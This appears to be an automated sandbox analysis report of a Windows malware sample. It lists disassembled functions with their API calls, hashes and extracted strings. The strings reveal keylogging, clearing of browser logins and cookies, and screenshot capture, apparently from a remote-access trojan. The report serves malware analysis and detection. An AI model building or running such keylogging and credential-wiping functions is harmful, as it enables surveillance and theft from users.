                                          • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                          • String ID:
                                          • API String ID: 486403682-0
                                          • Opcode ID: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
                                          • Instruction ID: 31fca79699fb41a21c899f6cb63a77230b732fc93c9d9a7c568002a0e8237c26
                                          • Opcode Fuzzy Hash: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
                                          • Instruction Fuzzy Hash: 66610771A00201ABCB30AF65CC81B6A77A5BF44744F14403AE804BBBC1D77CED4ADB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043E550, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • _free.LIBCMT ref: 0043E65B
                                          • _free.LIBCMT ref: 0043E672
                                          • _free.LIBCMT ref: 0043E691
                                          • _free.LIBCMT ref: 0043E6AC
                                          • _free.LIBCMT ref: 0043E6C3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID:
                                          • API String ID: 3033488037-0
                                          • Opcode ID: f001f06cdcfe8f1ea0b3aa8181d1418745bd2e249d929bfa00c40a3abc13420a
                                          • Instruction ID: 9ca46151fc1eb59705b8745a81b868f81510b806d69f04cfdfe39fc5a4c1e60e
                                          • Opcode Fuzzy Hash: f001f06cdcfe8f1ea0b3aa8181d1418745bd2e249d929bfa00c40a3abc13420a
                                          • Instruction Fuzzy Hash: 2C51E371A02304AFDB20DF2BC842B6A77F4EF5C724F54156EE909D7290E739D9018B88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043D66D, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 4876bfca316128ff265eb19f811c26853e8b78db9e24b60997fa00e8afe9ba77
                                          • Instruction ID: f44f3642cdb3200b4d66470b3fc96812a0cc5a4b7e600cbe4d0621a0c6eb3eb9
                                          • Opcode Fuzzy Hash: 4876bfca316128ff265eb19f811c26853e8b78db9e24b60997fa00e8afe9ba77
                                          • Instruction Fuzzy Hash: 9A41D136E00200DBDB20DF78D881A5EB3B5EF89714F1545AEE615EB351EB35AD01CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004493AC, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
                                          • __alloca_probe_16.LIBCMT ref: 00449431
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
                                          • __freea.LIBCMT ref: 0044949D
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID:
                                          • API String ID: 313313983-0
                                          • Opcode ID: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
                                          • Instruction ID: e49a694d908820c5dcacf8e8a5bbec85b76551c47cbf7292b4779bafd8218c50
                                          • Opcode Fuzzy Hash: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
                                          • Instruction Fuzzy Hash: 1231ED72A0020AABEF249F65DC41DAF7BA5EF00714F04412AFC08D7291E739DD52DBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A523, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Cleared browsers logins and cookies., xrefs: 0040A60C
                                          • [Info], xrefs: 0040A61B
                                          • [Cleared browsers logins and cookies.], xrefs: 0040A5FB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                                          • API String ID: 3472027048-899236412
                                          • Opcode ID: f19a15edf60fda488c37348f0fc0db5a19c500daee504fa477397d3b1e9aa14c
                                          • Instruction ID: 6d279061f464f32cb3b26c385cb9bb5b4933cac79da48b767b21b0c9aa47c76d
                                          • Opcode Fuzzy Hash: f19a15edf60fda488c37348f0fc0db5a19c500daee504fa477397d3b1e9aa14c
                                          • Instruction Fuzzy Hash: 8B31B0002483817ECA1167B518267EB6B921E53348F09447FF8D42B3D3DABA482C93AF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004475DA, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 004475E3
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447606
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044762C
                                          • _free.LIBCMT ref: 0044763F
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044764E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: 5eec5d71a415889a56e683248d1ebf8d82ebbf8c7c302d83c8f457d27242a7c7
                                          • Instruction ID: f196bec27739b8aa23800adfafa3dc4af21a9600f240203cb0157e91f0545353
                                          • Opcode Fuzzy Hash: 5eec5d71a415889a56e683248d1ebf8d82ebbf8c7c302d83c8f457d27242a7c7
                                          • Instruction Fuzzy Hash: D701B1B2605B117B77211ABA5C88C7B6A6EDAC6BB6716012AB904C3241DF698D0381BC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043D8BC, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 0043D8DA
                                            • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                            • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                          • _free.LIBCMT ref: 0043D8EC
                                          • _free.LIBCMT ref: 0043D8FF
                                          • _free.LIBCMT ref: 0043D910
                                          • _free.LIBCMT ref: 0043D921
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 7cd0db1548110b79a1ded3e98f00f81f4d90f56bef2f77a6b5e1d986c4959a05
                                          • Instruction ID: 5add5f9177ea0066f46c3e8b3c16d1701801f70c1477332ad76d85b4da6d78c6
                                          • Opcode Fuzzy Hash: 7cd0db1548110b79a1ded3e98f00f81f4d90f56bef2f77a6b5e1d986c4959a05
                                          • Instruction Fuzzy Hash: 08F0FEB1842A209BD7117F95BC424053B60E704728711053BF611E6771FBBA08A1DFDF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00446969, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _strpbrk.LIBCMT ref: 004469B8
                                          • _free.LIBCMT ref: 00446AD5
                                            • Part of subcall function 0043698A: IsProcessorFeaturePresent.KERNEL32(00000017,0043695C,00000000,00000000,?,0046C518,0040D10E,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000), ref: 0043698C
                                            • Part of subcall function 0043698A: GetCurrentProcess.KERNEL32(C0000417), ref: 004369AE
                                            • Part of subcall function 0043698A: TerminateProcess.KERNEL32(00000000), ref: 004369B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                          • String ID: *?$.
                                          • API String ID: 2812119850-3972193922
                                          • Opcode ID: f7b662a9281fcc6555c28f1c7bfcf564b5ca57641dd09a798a821b00110c85ab
                                          • Instruction ID: 2df9b6113c9c77aaef819b405c4b5e21061328770e73cee352be1be1b5cbe390
                                          • Opcode Fuzzy Hash: f7b662a9281fcc6555c28f1c7bfcf564b5ca57641dd09a798a821b00110c85ab
                                          • Instruction Fuzzy Hash: 9A51C5B1E00109AFEF14CFA9C841AAEB7B5EF4A314F25816EE454F7300E6799E018B55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040951E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                            • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • CloseHandle.KERNEL32(?), ref: 00409581
                                          • UnhookWindowsHookEx.USER32 ref: 00409594
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                                          • String ID: Online Keylogger Stopped$[Info]
                                          • API String ID: 3650414481-1913360614
                                          • Opcode ID: fa00e6ca810f7b458d358df112eb891d89e38a820840c17ff32a5804d1cb9a30
                                          • Instruction ID: 0bb2a425696eaad1e840e03cb6b1d67cba19ac7ec2a577a4888382e5ddaa93e6
                                          • Opcode Fuzzy Hash: fa00e6ca810f7b458d358df112eb891d89e38a820840c17ff32a5804d1cb9a30
                                          • Instruction Fuzzy Hash: 6201F5316002016BD7267B29CC0B7BE7BB58B42305F80006EE981221D3EBBD595AC7DE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C0AB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C119
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 2005118841-1866435925
                                          • Opcode ID: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
                                          • Instruction ID: fbfdbc6450803e664eb4f4f41a0da8e4bd286e2513790d23a86e9e7a09bff230
                                          • Opcode Fuzzy Hash: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
                                          • Instruction Fuzzy Hash: 5C01A770644208EAD714E791CC93FBB73549B10744F60853BBE01791C3EA7C5542CA5F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041094E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410978
                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410993
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041099C
                                          Strings
                                          • http\shell\open\command, xrefs: 0041096E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: http\shell\open\command
                                          • API String ID: 3677997916-1487954565
                                          • Opcode ID: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
                                          • Instruction ID: 1fd5564dc1120aea69868d5849519b592669f7fe773aa548349f028f89f009b1
                                          • Opcode Fuzzy Hash: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
                                          • Instruction Fuzzy Hash: 79F0C871500208FBDB10DA95EC09EDFBBBCEB84B52F1040A6B944E1151DA749B85C7A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004013AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
                                          • GetProcAddress.KERNEL32(00000000), ref: 004013BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: GetCursorInfo$User32.dll
                                          • API String ID: 1646373207-2714051624
                                          • Opcode ID: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
                                          • Instruction ID: 2d5915eac24d434730a095519f9524ab5112888a720461ae5624eff83defc800
                                          • Opcode Fuzzy Hash: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
                                          • Instruction Fuzzy Hash: AAB092B0582B10ABC6007FA0AD0D9087AB4E658B43B2000B3B102C39E5EBB881209F1F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401468, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
                                          • GetProcAddress.KERNEL32(00000000), ref: 00401479
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetLastInputInfo$User32.dll
                                          • API String ID: 2574300362-1519888992
                                          • Opcode ID: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
                                          • Instruction ID: efdeec6c1e0f4d8d8c2c1c08f07324648747689b8805d4bbb4dbcfd19e195539
                                          • Opcode Fuzzy Hash: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
                                          • Instruction Fuzzy Hash: F8B092B05427049BC740AFF0AC4DA087A78B644F43B1001A6F142825E9EBB88110AA2F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401485, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
                                          • GetProcAddress.KERNEL32(00000000), ref: 00401496
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetConsoleWindow$kernel32.dll
                                          • API String ID: 2574300362-100875112
                                          • Opcode ID: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
                                          • Instruction ID: d846cdfbb623d578af620becd0756bbfaced08f68ce80228df047fade16f1a3c
                                          • Opcode Fuzzy Hash: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
                                          • Instruction Fuzzy Hash: D6B092B05433049BC7509FB0AE5DA097B79A604F87B1000A6F641821E9EEB881009A2F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00443812, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          • Opcode ID: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
                                          • Instruction ID: 66ba9c3cc4a36ed88c16bb93380f7ac1aac5537698642897c3979fdba8336104
                                          • Opcode Fuzzy Hash: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
                                          • Instruction Fuzzy Hash: A0A14672A403869FFB11CE18C8817AEBBE1EF15756F18416FE485AB382C27C9E45C758
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0045029A, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 1a101bff93856162e0eecd218a29cc5ec6eb8450f971aca8f51eab16816e60a9
                                          • Instruction ID: ec6e5165c6e0660f46293b9fdcc1e9d4cfa0c4fde508876c15d21b96f536f29c
                                          • Opcode Fuzzy Hash: 1a101bff93856162e0eecd218a29cc5ec6eb8450f971aca8f51eab16816e60a9
                                          • Instruction Fuzzy Hash: A9417D35A00500ABDB206FBA8C45A6F3BA4EF45376F14065FFC18D7293D67C8815866E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043C481, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
                                          • Instruction ID: 733164f05b9f7aeaec00074263a2a0c70db5c9dd2c0fe6a7367e2e5b9d18385d
                                          • Opcode Fuzzy Hash: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
                                          • Instruction Fuzzy Hash: 20412972600714BFD7249F78CC81B6ABBE8EB8C714F10952FF111EB281D779A9018B84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043D288, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4870b14578959949d470efee0e3ae80b46fc322b045ab8e55c1ad6186186a3d3
                                          • Instruction ID: e4b0062e58d0d7237c716dd182029255e048b2798701f0240ba592bb915f7d8f
                                          • Opcode Fuzzy Hash: 4870b14578959949d470efee0e3ae80b46fc322b045ab8e55c1ad6186186a3d3
                                          • Instruction Fuzzy Hash: 5101F2B2A097063EF6212A783CC1F27220CDF453B8F341B6BF521622D5DE78CC014168
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043D307, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d45ed3c6c3bd31a724491cd16fa325f7aa8b90dcc6297d7977442c4779f1d884
                                          • Instruction ID: af3406132430cef04dbb00c021b8739ed0fb4e326e8fb5295b0caa8951ed8692
                                          • Opcode Fuzzy Hash: d45ed3c6c3bd31a724491cd16fa325f7aa8b90dcc6297d7977442c4779f1d884
                                          • Instruction Fuzzy Hash: 6D0167B29096167AA71125797CC1D6B631CEF553B9B20132BB921512D1DA78CC114169
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00442033, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
                                          • GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                                          • Instruction ID: 1f93bee859a7bc905b4f209078c92e3314857c5c8a056cdaea3c14562744cb27
                                          • Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                                          • Instruction Fuzzy Hash: EC01D432601723ABD7314E789D44A6777D8AF55BA2BA00632FB06D3241DB64D801C6E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00417678, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D
                                          • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004176AF
                                          • CloseHandle.KERNEL32(00000000), ref: 004176BA
                                          • CloseHandle.KERNEL32(00000000), ref: 004176C2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$FileModuleNameOpenProcess
                                          • String ID:
                                          • API String ID: 3706008839-0
                                          • Opcode ID: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
                                          • Instruction ID: f8a04bcb30d388e69ca110f6c0d2bfbdbb8b62fcd9983a5c8f5887249ce98a8e
                                          • Opcode Fuzzy Hash: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
                                          • Instruction Fuzzy Hash: 44F0E9312447156BD6205A585C09FAB367C8784B93F100177F908D5292EEA4D94246AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041459C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 249COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                                            • Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00414646
                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 0041469C
                                            • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Create$Stream$Compatibleclosesocket
                                          • String ID: image/jpeg
                                          • API String ID: 3038386933-3785015651
                                          • Opcode ID: 5d5206489b6c5c193360d77052477a81b258d00dd93eef41709245a492873c69
                                          • Instruction ID: 76b108af669c3063bc8327b28f0eeeb389dcf0988f89de8eeeeaadbda1c1d6eb
                                          • Opcode Fuzzy Hash: 5d5206489b6c5c193360d77052477a81b258d00dd93eef41709245a492873c69
                                          • Instruction Fuzzy Hash: F8816D716083419BC324FB25C985AEFB3A4AFC5318F00493FB5969B1D1EF785945CB8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00447399, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
                                          • GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID: :rD
                                          • API String ID: 546120528-3120900009
                                          • Opcode ID: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
                                          • Instruction ID: 614f5d5ef064064d7ec38ea7b35d3f5f756231f868e2d753d05d5f6cbb9767d4
                                          • Opcode Fuzzy Hash: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
                                          • Instruction Fuzzy Hash: 65513370A086059EFB20CF35C8816BBBFA5EF41304F14406FD0868B251E73D9947CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00447044, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Info
                                          • String ID: $vuD
                                          • API String ID: 1807457897-1530330280
